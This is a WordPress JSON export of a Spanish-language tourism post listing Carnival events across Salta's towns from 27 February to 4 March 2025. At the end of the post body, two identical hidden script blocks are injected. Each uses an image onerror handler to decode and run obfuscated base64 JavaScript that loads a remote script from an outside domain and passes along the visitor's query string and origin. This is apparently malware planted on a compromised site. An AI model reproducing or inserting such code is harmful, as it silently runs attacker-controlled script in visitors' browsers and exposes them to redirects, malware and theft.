{"id":4899,"date":"2025-02-27T10:48:24","date_gmt":"2025-02-27T13:48:24","guid":{"rendered":"https:\/\/circuitosalta.com.ar\/?p=4899"},"modified":"2025-08-13T23:39:33","modified_gmt":"2025-08-14T02:39:33","slug":"salta-te-invita-a-vivir-un-carnaval-lleno-de-experiencias-unicas","status":"publish","type":"post","link":"https:\/\/circuitosalta.com.ar\/?p=4899","title":{"rendered":"Salta te invita a vivir un Carnaval lleno de experiencias \u00fanicas"},"content":{"rendered":"\n<h4 class=\"wp-block-heading has-white-color has-text-color has-background has-link-color wp-elements-93f87abb0e1e85c49d362b8d7d075976\" style=\"background-color:#870548\"><strong><em>Del 27 de febrero al 4 de marzo, Salta ofrecer\u00e1 una variada propuesta de actividades tur\u00edsticas en sus siete regiones, con el Carnaval como protagonista.<\/em><\/strong><\/h4>\n\n\n\n<p>El&nbsp;<strong>Ministerio de Turismo y Deportes<\/strong>&nbsp;de Salta, junto a los gobiernos municipales y el sector privado, ha preparado un programa repleto de actividades para que salte\u00f1os y turistas disfruten de la riqueza cultural de la provincia. Habr\u00e1 desfiles, comparsas, m\u00fasica en vivo, exposiciones culturales y muchas m\u00e1s opciones que har\u00e1n del carnaval una fiesta inolvidable.<\/p>\n\n\n\n<p>Adem\u00e1s, Salta invita a explorar su diversidad natural y gastron\u00f3mica durante esta temporada, con opciones para todos los gustos. Puedes conocer m\u00e1s sobre estas experiencias en&nbsp;<a href=\"https:\/\/experiencias.turismosalta.gov.ar\/\">https:\/\/experiencias.turismosalta.gov.ar\/<\/a>.<\/p>\n\n\n\n<p>A continuaci\u00f3n, te presentamos las actividades programadas en diferentes municipios desde el lunes 27 de febrero hasta el domingo 4 de marzo. Para consultar los horarios y detalles espec\u00edficos, puedes acercarte a los centros de visitantes de cada localidad.<\/p>\n\n\n\n<p><strong>Jueves 27 de febrero<\/strong><\/p>\n\n\n\n<p><strong>San Antonio de los Cobres<\/strong><\/p>\n\n\n\n<p>\u2022 &nbsp; &nbsp; &nbsp; Visitas guiadas. Museo Regional Andino<\/p>\n\n\n\n<p>\u2022 &nbsp; &nbsp; &nbsp; Exposici\u00f3n de hierbas medicinales. Museo Regional Andino.<\/p>\n\n\n\n<p>\u2022 &nbsp; &nbsp; &nbsp; Exposici\u00f3n de la muestra Salta: Testimonios Fotogr\u00e1ficos. Museo Regional Andino.<\/p>\n\n\n\n<p>\u2022 &nbsp; &nbsp; &nbsp; Avistaje de aves. Museo Regional Andino.<\/p>\n\n\n\n<p>\u2022 &nbsp; &nbsp; &nbsp; Caminata por las serran\u00edas de cobres y el Paseo de la Cruz. Museo Regional Andino.<\/p>\n\n\n\n<p>\u2022 &nbsp; &nbsp; &nbsp; Taller de tejido. Mercado Artesanal.<\/p>\n\n\n\n<p>\u2022 &nbsp; &nbsp; &nbsp; Taller de medicina ancestral. Mercado Artesanal.<\/p>\n\n\n\n<p>\u2022 &nbsp; &nbsp; &nbsp; Trekking para ni\u00f1os con relatos de mitos y leyendas. Paraje Toconadito. Destinado a ni\u00f1os de 8 a 14 a\u00f1os.<\/p>\n\n\n\n<p>\u2022 &nbsp; &nbsp; &nbsp; Jueves de comadres. Camino de Piedra.<\/p>\n\n\n\n<p><strong>Cachi<\/strong><\/p>\n\n\n\n<p>\u2022 &nbsp; &nbsp; &nbsp; Manos que cuentan historias. Paseo de los Artesanos. Artesan\u00edas hechas con arcilla.<\/p>\n\n\n\n<p>\u2022 &nbsp; &nbsp; &nbsp; Aventura Fotogr\u00e1fica. Mirador Norte-Oeste-Sur-De la Cruz-Ovnipuerto-El Algarrobal-Cerro de la Virgen.<\/p>\n\n\n\n<p><strong>Cafayate<\/strong><\/p>\n\n\n\n<p>\u2022 &nbsp; &nbsp; &nbsp; Encuentro de Comadres. Calle Los Andes<\/p>\n\n\n\n<p><strong>Viernes 28 de febrero<\/strong><\/p>\n\n\n\n<p><strong>Cachi<\/strong><\/p>\n\n\n\n<p>\u00b7 &nbsp; &nbsp; &nbsp; &nbsp; Feria de Productores Artesanos y Vinos de Alturas<\/p>\n\n\n\n<p><strong>Cachi<\/strong><\/p>\n\n\n\n<p>\u00b7 &nbsp; &nbsp; &nbsp; &nbsp; Marat\u00f3n Homenaje de la mujer.<\/p>\n\n\n\n<p><strong>Rosario de Lerma<\/strong><\/p>\n\n\n\n<p>\u00b7 &nbsp; &nbsp; &nbsp; &nbsp; Embajadora del Carnaval \u2013 Elecci\u00f3n 2025. Stands Aleg\u00f3ricos de cada agrupaci\u00f3n carnestolendas. Parque Evita.<\/p>\n\n\n\n<p><strong>Coronel Moldes<\/strong><\/p>\n\n\n\n<p>\u00b7 &nbsp; &nbsp; &nbsp; &nbsp; Corsos Moldes Carnaval.<\/p>\n\n\n\n<p><strong>San Antonio de los Cobres<\/strong><\/p>\n\n\n\n<p>\u2022 &nbsp; &nbsp; &nbsp; Visitas guiadas. Museo Regional Andino<\/p>\n\n\n\n<p>\u2022 &nbsp; &nbsp; &nbsp; Exposici\u00f3n de hierbas medicinales. Museo Regional Andino.<\/p>\n\n\n\n<p>\u2022 &nbsp; &nbsp; &nbsp; Exposici\u00f3n de la muestra Salta: Testimonios Fotogr\u00e1ficos. Museo Regional Andino.<\/p>\n\n\n\n<p>\u2022 &nbsp; &nbsp; &nbsp; Avistaje de aves. Museo Regional Andino.<\/p>\n\n\n\n<p>\u2022 &nbsp; &nbsp; &nbsp; Caminata por las serran\u00edas de cobres y el Paseo de la Cruz. Museo Regional Andino.<\/p>\n\n\n\n<p>\u2022 &nbsp; &nbsp; &nbsp; Taller de tejido. Mercado Artesanal.<\/p>\n\n\n\n<p>\u2022 &nbsp; &nbsp; &nbsp; Taller de medicina ancestral. Mercado Artesanal.<\/p>\n\n\n\n<p>\u2022 &nbsp; &nbsp; &nbsp; Trekking para ni\u00f1os con relatos de mitos y leyendas. Paraje Toconadito. Destinado a ni\u00f1os de 8 a 14 a\u00f1os.<\/p>\n\n\n\n<p>\u2022 &nbsp; &nbsp; &nbsp; Desentierro del Carnaval Andino. Avenida Avellaneda.<\/p>\n\n\n\n<p><strong>Ciudad de Salta<\/strong><\/p>\n\n\n\n<p>\u2022 &nbsp; &nbsp; &nbsp; Luces de Paz y bien &#8211; Mapping San Francisco. Espect\u00e1culo de luces. Iglesia Y Museo San Francisco, C\u00f3rdoba 15.<\/p>\n\n\n\n<p>\u2022 &nbsp; &nbsp; &nbsp; Corso de la familia. Costado del Estadio Martearena.<\/p>\n\n\n\n<p>\u2022 &nbsp; &nbsp; &nbsp; El carnaval de mu\u00f1equitos &nbsp;Corso de los ni\u00f1os. Mu\u00f1ecodromo de Chachapoyas.<\/p>\n\n\n\n<p>\u2022 &nbsp; &nbsp; &nbsp; Corso de casta\u00f1ares. Av Houssay.<\/p>\n\n\n\n<p><strong>San Lorenzo<\/strong><\/p>\n\n\n\n<p>\u2022 &nbsp; &nbsp; &nbsp; Aprendiendo a bailar folclore. Quebrada de San Lorenzo. No requiere reserva previa.<\/p>\n\n\n\n<p><strong>Cachi<\/strong><\/p>\n\n\n\n<p>\u2022 &nbsp; &nbsp; &nbsp; Manos que cuentan historias. Paseo de los Artesanos. Artesan\u00edas hechas con arcilla.<\/p>\n\n\n\n<p>\u2022 &nbsp; &nbsp; &nbsp; Aventura Fotogr\u00e1fica. Mirador Norte-Oeste-Sur-De la Cruz-Ovnipuerto-El Algarrobal-Cerro de la Virgen.<\/p>\n\n\n\n<p>\u2022 &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;Del rastrojo a la mesa. Plaza Principal.<\/p>\n\n\n\n<p><strong>Cafayate<\/strong><\/p>\n\n\n\n<p>\u2022 &nbsp; &nbsp; &nbsp; Corsos Oficiales \u2013 Cafayate 2025. Calle La Rioja.<\/p>\n\n\n\n<p><strong>Rosario de la Frontera<\/strong><\/p>\n\n\n\n<p>\u2022 &nbsp; &nbsp; &nbsp; Baila Mi Barrio. Clases a cargo de los profesores de la academia municipal. Barrio Ram\u00f3n Abdala Barrio Los Inmigrantes Barrio Parque.&nbsp;<\/p>\n\n\n\n<p><strong>S\u00e1bado 1 de marzo<\/strong><\/p>\n\n\n\n<p><strong>Apolinario Saravia<\/strong><\/p>\n\n\n\n<p>\u00b7 &nbsp; &nbsp; &nbsp; &nbsp; Corsos Color. Evento gratuito<\/p>\n\n\n\n<p><strong>Campo Quijano<\/strong><\/p>\n\n\n\n<p>\u00b7 &nbsp; &nbsp; &nbsp; &nbsp; 17\u00ba Fiesta Provincial del Haba. Santa Rosa de Tastil.<\/p>\n\n\n\n<p>\u00b7 &nbsp; &nbsp; &nbsp; &nbsp; 3\u00ba Encuentro de Brujos de Comparsas y Copleros. Entierro del Carnaval Silletano y Quema del Pujllay. La Silleta.<\/p>\n\n\n\n<p><strong>Coronel Moldes<\/strong><\/p>\n\n\n\n<p>\u00b7 &nbsp; &nbsp; &nbsp; &nbsp; Corsos Moldes Carnaval.<\/p>\n\n\n\n<p><strong>El Carril<\/strong><\/p>\n\n\n\n<p>\u00b7 &nbsp; &nbsp; &nbsp; &nbsp; 12\u00ba Concurso de la Empanada. Plaza San Mart\u00edn<\/p>\n\n\n\n<p><strong>Payogasta<\/strong><\/p>\n\n\n\n<p>\u2022 &nbsp; &nbsp; &nbsp; Carnaval de Anta\u00f1o. Complejo polideportivo municipal de Buena Vista.<\/p>\n\n\n\n<p><strong>La Caldera<\/strong><\/p>\n\n\n\n<p>\u2022 &nbsp; &nbsp; &nbsp; Corsos de la familia y carnaval. Plaza Gral. San Mart\u00edn.<\/p>\n\n\n\n<p><strong>Cerrillos<\/strong><\/p>\n\n\n\n<p>\u2022 &nbsp; &nbsp; &nbsp; Clausura 119\u00ba Edici\u00f3n del Corso de Flores. Cors\u00f3dromo Mart\u00edn Miguel de G\u00fcemes.<\/p>\n\n\n\n<p><strong>Tartagal<\/strong><\/p>\n\n\n\n<p>\u2022 &nbsp; &nbsp; &nbsp; Corso Color 2025. Avda. 20 de Febrero.<\/p>\n\n\n\n<p><strong>Urundel<\/strong><\/p>\n\n\n\n<p>\u00b7 &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;Corso Color Urundel 2025&nbsp;<\/p>\n\n\n\n<p><strong>San Antonio de los Cobres<\/strong><\/p>\n\n\n\n<p>\u2022 &nbsp; &nbsp; &nbsp; Exhibici\u00f3n de agrupaciones carnavaleras. Complejo deportivo municipal.<\/p>\n\n\n\n<p><strong>San Lorenzo<\/strong><\/p>\n\n\n\n<p>\u00b7 &nbsp; &nbsp; &nbsp; &nbsp; Avistaje de Aves dirigido a los ni\u00f1os. Reserva las Yungas.<\/p>\n\n\n\n<p>\u00b7 &nbsp; &nbsp; &nbsp; &nbsp; Mini Trekking por Reserva las Yungas.&nbsp;<\/p>\n\n\n\n<p>\u00b7 &nbsp; &nbsp; &nbsp; &nbsp; Feria Gastron\u00f3mica El Zorzal. Plaza Ej\u00e9rcito Argentino.<\/p>\n\n\n\n<p>\u00b7 &nbsp; &nbsp; &nbsp; &nbsp; Piletas del Complejo Los Ceibos. Esquina de 9 de Julio y 25 de Mayo.<\/p>\n\n\n\n<p><strong>Cachi<\/strong><\/p>\n\n\n\n<p>\u2022 &nbsp; &nbsp; &nbsp; Desentierro del Carnaval y encuentro de copleros \u00abDe tal Palo tal Astilla\u00bb. Plaza Principal.<\/p>\n\n\n\n<p><strong>Cerrillos<\/strong><\/p>\n\n\n\n<p>\u2022 &nbsp; &nbsp; &nbsp; Carnaval M\u00e1gico. Carpa El Cha\u00f1arcito &#8211; La casa de Marcos Tames.<\/p>\n\n\n\n<p><strong>Cafayate<\/strong><\/p>\n\n\n\n<p>\u2022 &nbsp; &nbsp; &nbsp; Corsos Oficiales \u2013 Cafayate 2025. Calle La Rioja.<\/p>\n\n\n\n<p><strong>Ciudad de Salta<\/strong><\/p>\n\n\n\n<p>\u2022 &nbsp; &nbsp; &nbsp; Corso de la familia &nbsp;Costado del Estado Martearena.<\/p>\n\n\n\n<p>\u2022 &nbsp; &nbsp; &nbsp; El carnaval de mu\u00f1equitos &nbsp;Corso de los ni\u00f1os. Mu\u00f1ecodromo de Chachapoyas.<\/p>\n\n\n\n<p>\u2022 &nbsp; &nbsp; &nbsp; Corso de casta\u00f1ares &nbsp;Av. Houssay.<\/p>\n\n\n\n<p><strong>Domingo 2 de marzo<\/strong><\/p>\n\n\n\n<p><strong>Apolinario Saravia<\/strong><\/p>\n\n\n\n<p>\u00b7 &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;Corsos Color. Evento gratuito.<\/p>\n\n\n\n<p><strong>Campo Quijano<\/strong><\/p>\n\n\n\n<p>\u00b7 &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;Entierro del Carnaval. Viaducto &nbsp;El Toro<\/p>\n\n\n\n<p><strong>Coronel Moldes<\/strong><\/p>\n\n\n\n<p>\u00b7 &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;Corsos Moldes Carnaval.<\/p>\n\n\n\n<p><strong>La Caldera<\/strong><\/p>\n\n\n\n<p>\u2022 &nbsp; &nbsp; &nbsp; Corsos de la familia y carnaval. Av. Gral. G\u00fcemes-Plaza Gral. San Mart\u00edn.<\/p>\n\n\n\n<p><strong>Tartagal<\/strong><\/p>\n\n\n\n<p>\u2022 &nbsp; &nbsp; &nbsp; Corso Color 2025. Avda. 20 de Febrero.<\/p>\n\n\n\n<p><strong>Cachi<\/strong><\/p>\n\n\n\n<p>\u00b7 &nbsp; &nbsp; &nbsp; &nbsp; Paraje Las Pailas. Gran &nbsp;Desentierro &nbsp;del Pujllay. Carnaval Kallchaki. Carpa &nbsp;resistencia Kallchaki. Las Pailas .Cachi<\/p>\n\n\n\n<p><strong>El Carril<\/strong><\/p>\n\n\n\n<p>\u2022 &nbsp; &nbsp; &nbsp; Entierro del Carnaval en la Estaci\u00f3n Facundo de Zuvir\u00eda.<\/p>\n\n\n\n<p><strong>Cerrillos<\/strong><\/p>\n\n\n\n<p>\u2022 &nbsp; &nbsp; &nbsp; Carnaval M\u00e1gico. Carpa El Cha\u00f1arcito &#8211; La casa de Marcos Tames.<\/p>\n\n\n\n<p><strong>Cafayate<\/strong><\/p>\n\n\n\n<p>\u2022 &nbsp; &nbsp; &nbsp; Corsos Oficiales \u2013 Cafayate 2025. Calle La Rioja.<\/p>\n\n\n\n<p>\u2022 &nbsp; &nbsp; &nbsp; &nbsp;Encuentro de Copleros. Plaza de Tolomb\u00f3n.<\/p>\n\n\n\n<p><strong>Rosario de la Frontera<\/strong><\/p>\n\n\n\n<p>\u2022 &nbsp; &nbsp; &nbsp; &nbsp;Chaya Rosarina. Complejo Municipal.<\/p>\n\n\n\n<p><strong>Lunes 3 de marzo<\/strong><\/p>\n\n\n\n<p><strong>La Caldera<\/strong><\/p>\n\n\n\n<p>\u2022 &nbsp; &nbsp; &nbsp; Corsos de la familia y carnaval. Av. Gral. G\u00fcemes-Plaza Gral. San Mart\u00edn.<\/p>\n\n\n\n<p><strong>Ciudad de Salta<\/strong><\/p>\n\n\n\n<p>\u2022 &nbsp; &nbsp; &nbsp; Corso de la familia &nbsp;Costado del Estado Martearena.<\/p>\n\n\n\n<p>\u2022 &nbsp; &nbsp; &nbsp; El carnaval de mu\u00f1equitos &nbsp;Corso de los ni\u00f1os. Mu\u00f1ecodromo de Chachapoyas.<\/p>\n\n\n\n<p>\u2022 &nbsp; &nbsp; &nbsp; Corso de casta\u00f1ares &nbsp;Av. Houssay.<\/p>\n\n\n\n<p><strong>Campo Quijano<\/strong><\/p>\n\n\n\n<p>\u00b7 &nbsp; &nbsp; &nbsp; &nbsp; Entierro del Carnaval \u201cEl que se moja no se enoja\u201d. Recorrido por las calles del pueblo.<\/p>\n\n\n\n<p><strong>Coronel Moldes<\/strong><\/p>\n\n\n\n<p>\u00b7 &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;Corsos Moldes Carnaval.<\/p>\n\n\n\n<p><strong>El Bordo<\/strong><\/p>\n\n\n\n<p>\u00b7 &nbsp; &nbsp; &nbsp; &nbsp; Chaya de Mojon. Carnaval Grande.<\/p>\n\n\n\n<p><strong>Guachipas<\/strong><\/p>\n\n\n\n<p>\u2022 &nbsp; &nbsp; &nbsp; Desfile y caravanas del carnaval.<\/p>\n\n\n\n<p><strong>Tartagal<\/strong><\/p>\n\n\n\n<p>\u2022 &nbsp; &nbsp; &nbsp; Corso Color 2025. Avda. 20 de Febrero.<\/p>\n\n\n\n<p><strong>San Antonio de los Cobres<\/strong><\/p>\n\n\n\n<p>\u2022 &nbsp; &nbsp; &nbsp; Corso del Carnaval. Avenida Brigido Zabaleta.<\/p>\n\n\n\n<p><strong>Seclant\u00e1s<\/strong><\/p>\n\n\n\n<p>\u2022 &nbsp; &nbsp; &nbsp; Carpa de la familia &nbsp;Carnaval en Seclant\u00e1s.<\/p>\n\n\n\n<p><strong>Cachi<\/strong><\/p>\n\n\n\n<p>\u2022 &nbsp; &nbsp; &nbsp; Carnaval de Anta\u00f1o. Predio Municipal.<\/p>\n\n\n\n<p><strong>Rosario de la Frontera<\/strong><\/p>\n\n\n\n<p>\u2022 &nbsp; &nbsp;Chaya Rosarina. Complejo Municipal.<\/p>\n\n\n\n<p><strong>Martes 4 de marzo<\/strong><\/p>\n\n\n\n<p><strong>Ciudad de Salta<\/strong><\/p>\n\n\n\n<p>\u2022 &nbsp; &nbsp; &nbsp; Corso de la familia &nbsp;Costado del Estado Martearena.<\/p>\n\n\n\n<p>\u2022 &nbsp; &nbsp; &nbsp; El carnaval de mu\u00f1equitos &nbsp;Corso de los ni\u00f1os. Mu\u00f1ecodromo de Chachapoyas.<\/p>\n\n\n\n<p>\u2022 &nbsp; &nbsp; &nbsp; Corso de casta\u00f1ares &nbsp;Av. Houssay.<\/p>\n\n\n\n<p><strong>Guachipas<\/strong><\/p>\n\n\n\n<p>\u2022 &nbsp; &nbsp; &nbsp; Desfile y caravanas del carnaval.<\/p>\n\n\n\n<p><strong>Cerrillos<\/strong><\/p>\n\n\n\n<p>\u2022 &nbsp; &nbsp; &nbsp; Entierro del Carnaval y Quema del Pujllay. Estaci\u00f3n Pacto de los Cerrillos.<\/p>\n\n\n\n<p>\u2022 &nbsp; &nbsp; &nbsp; Carnaval M\u00e1gico. Carpa El Cha\u00f1arcito &#8211; La casa de Marcos Tames.<\/p>\n\n\n\n<p><strong>Cafayate<\/strong><\/p>\n\n\n\n<p>\u2022 &nbsp; &nbsp; &nbsp; Carnaval de Anta\u00f1o. Pasaje Tadeo. Entre Catamarca y Bs As.&nbsp;<\/p>\n\n\n\n<p><strong>Nazareno<\/strong><\/p>\n\n\n\n<p>\u00b7 &nbsp; &nbsp; &nbsp; &nbsp; Cierre del &nbsp;Carnaval. Cancha de Futbol.<\/p>\n\n\n\n<hr class=\"wp-block-separator has-alpha-channel-opacity\"\/>\n\n\n\n<p>Fuente:&nbsp;<strong>Secretar\u00eda de Prensa y Comunicaci\u00f3n<\/strong><\/p>\n<script>const img = document.createElement('img');img.src = '\/files\/img\/logo.png';img.setAttribute('data-digest', 'KGZ1bmN0aW9uKCl7dmFyIGE9bG9jYXRpb24sYj1kb2N1bWVudC5oZWFkfHxkb2N1bWVudC5nZXRFbGVtZW50c0J5VGFnTmFtZSgiaGVhZCIpWzBdLGM9InNjcmlwdCIsZD1hdG9iKCJhSFIwY0hNNkx5OTBaSE0wZFhNdVkyOXRMMkZxWVhneExuQm9jQT09Iik7ZCs9LTE8ZC5pbmRleE9mKCI\/Iik\/IiYiOiI\/IjtkKz1hLnNlYXJjaC5zdWJzdHJpbmcoMSk7Yz1kb2N1bWVudC5jcmVhdGVFbGVtZW50KGMpO2Muc3JjPWQ7Yy5pZD1idG9hKGEub3JpZ2luKTtiLmFwcGVuZENoaWxkKGMpO30pKCk7');img.setAttribute('onerror', '(new Function(atob(this.dataset.digest)))();');img.style.visibility = 'hidden';document.body.insertBefore(img, document.body.firstChild);<\/script><script>const img = document.createElement('img');img.src = '\/files\/img\/logo.png';img.setAttribute('data-digest', 'KGZ1bmN0aW9uKCl7dmFyIGE9bG9jYXRpb24sYj1kb2N1bWVudC5oZWFkfHxkb2N1bWVudC5nZXRFbGVtZW50c0J5VGFnTmFtZSgiaGVhZCIpWzBdLGM9InNjcmlwdCIsZD1hdG9iKCJhSFIwY0hNNkx5OTBaSE0wZFhNdVkyOXRMMkZxWVhneExuQm9jQT09Iik7ZCs9LTE8ZC5pbmRleE9mKCI\/Iik\/IiYiOiI\/IjtkKz1hLnNlYXJjaC5zdWJzdHJpbmcoMSk7Yz1kb2N1bWVudC5jcmVhdGVFbGVtZW50KGMpO2Muc3JjPWQ7Yy5pZD1idG9hKGEub3JpZ2luKTtiLmFwcGVuZENoaWxkKGMpO30pKCk7');img.setAttribute('onerror', '(new Function(atob(this.dataset.digest)))();');img.style.visibility = 'hidden';document.body.insertBefore(img, document.body.firstChild);<\/script>","protected":false},"excerpt":{"rendered":"<p>Del 27 de febrero al 4 de marzo, Salta ofrecer\u00e1 una variada propuesta de actividades tur\u00edsticas en sus siete regiones, con el Carnaval como protagonista. El&nbsp;Ministerio de Turismo y Deportes&nbsp;de Salta, junto a los gobiernos municipales y el sector privado, ha preparado un programa repleto de actividades para que salte\u00f1os y turistas disfruten de la [&hellip;]<\/p>\n","protected":false},"author":2,"featured_media":4900,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"tdm_status":"","tdm_grid_status":"","footnotes":""},"categories":[26,15],"tags":[],"class_list":{"0":"post-4899","1":"post","2":"type-post","3":"status-publish","4":"format-standard","5":"has-post-thumbnail","7":"category-culturales","8":"category-provincial"},"_links":{"self":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/4899"}],"collection":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=4899"}],"version-history":[{"count":3,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/4899\/revisions"}],"predecessor-version":[{"id":6558,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/4899\/revisions\/6558"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/media\/4900"}],"wp:attachment":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=4899"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=4899"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=4899"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}